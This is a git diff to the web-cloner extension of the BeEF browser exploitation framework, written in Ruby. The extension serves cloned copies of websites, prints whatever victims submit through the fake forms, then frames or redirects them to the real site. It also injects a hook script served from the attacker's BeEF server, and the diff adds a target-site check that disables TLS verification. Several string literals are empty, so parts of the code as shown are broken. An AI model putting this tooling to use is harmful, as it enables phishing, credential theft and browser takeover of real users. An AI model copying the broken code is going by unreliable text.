diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb index af6a899cd..53ea3314f 100644 --- a/extensions/social_engineering/web_cloner/interceptor.rb +++ b/extensions/social_engineering/web_cloner/interceptor.rb @@ -19,24 +19,25 @@ module BeEF class Interceptor < Sinatra::Base - def initialize(file_path, redirect_to) + def initialize(file_path, redirect_to, frameable, beef_hook) super self file = File.open(file_path,'r') @cloned_page = file.read @redirect_to = redirect_to + @frameable = frameable + @beef_hook = beef_hook file.close - print_info "Cloned page using content from [cloned_pages/#{File.basename(file_path)}] initialized." + print_info "Cloned page with content from [cloned_pages/#{File.basename(file_path)}] initialized." end # intercept GET get "/" do print_info "GET request" + print_info "Referer: #{request.referer}" @cloned_page end # intercept POST - # the 'action' attribute of the 'form' element is modified to the URI / - # in this way the request can be intercepted post "/" do print_info "POST request" request.body.rewind @@ -44,13 +45,14 @@ module BeEF print_info "Intercepted data:" print_info data - redirect @redirect_to - - #todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present - #todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user - #todo: to the original page + if @frameable + print_info "Page can be framed :-) Loading original URL into iFrame..." + "\n" + else + print_info "Page can not be framed :-) Redirecting to original URL..." + redirect @redirect_to + end end - end end end diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb index 1261f51c8..0648b91f0 100644 --- a/extensions/social_engineering/web_cloner/web_cloner.rb +++ b/extensions/social_engineering/web_cloner/web_cloner.rb @@ -24,6 +24,7 @@ module BeEF @http_server = BeEF::Core::Server.instance @config = BeEF::Core::Configuration.instance @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/" + @beef_hook = "http://#{@config.get('beef.http.host')}:#{@config.get('beef.http.port')}#{@config.get('beef.http.hook_file')}" end def clone_page(url) @@ -68,7 +69,10 @@ module BeEF print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]" file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve - @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url)) + + # Check if the original URL can be framed + frameable = is_frameable(url) + @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path, url, frameable, @beef_hook)) print_info "Mounting cloned page on URL [/#{output}]" @http_server.remap end @@ -76,14 +80,33 @@ module BeEF private # Replace with def add_beef_hook(line) - host = @config.get('beef.http.host') - port = @config.get('beef.http.port') - js = @config.get('beef.http.hook_file') - hook = "http://#{host}:#{port}#{js}" - line.gsub!("","\n") + line.gsub!("","\n") line end + private + # check if the original URL can be framed. NOTE: doesn't check for framebusting code atm + def is_frameable(url) + result = true + uri = URI(url) + http = Net::HTTP.new(uri.host, uri.port) + if uri.scheme == "https" + http.use_ssl = true + http.verify_mode = OpenSSL::SSL::VERIFY_NONE + end + request = Net::HTTP::Get.new(uri.request_uri) + response = http.request(request) + frame_opt = response["X-Frame-Options"] + + if frame_opt != nil + if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0 + result = false + end + end + print_info "Page can be framed: [#{result}]" + result + end + end end end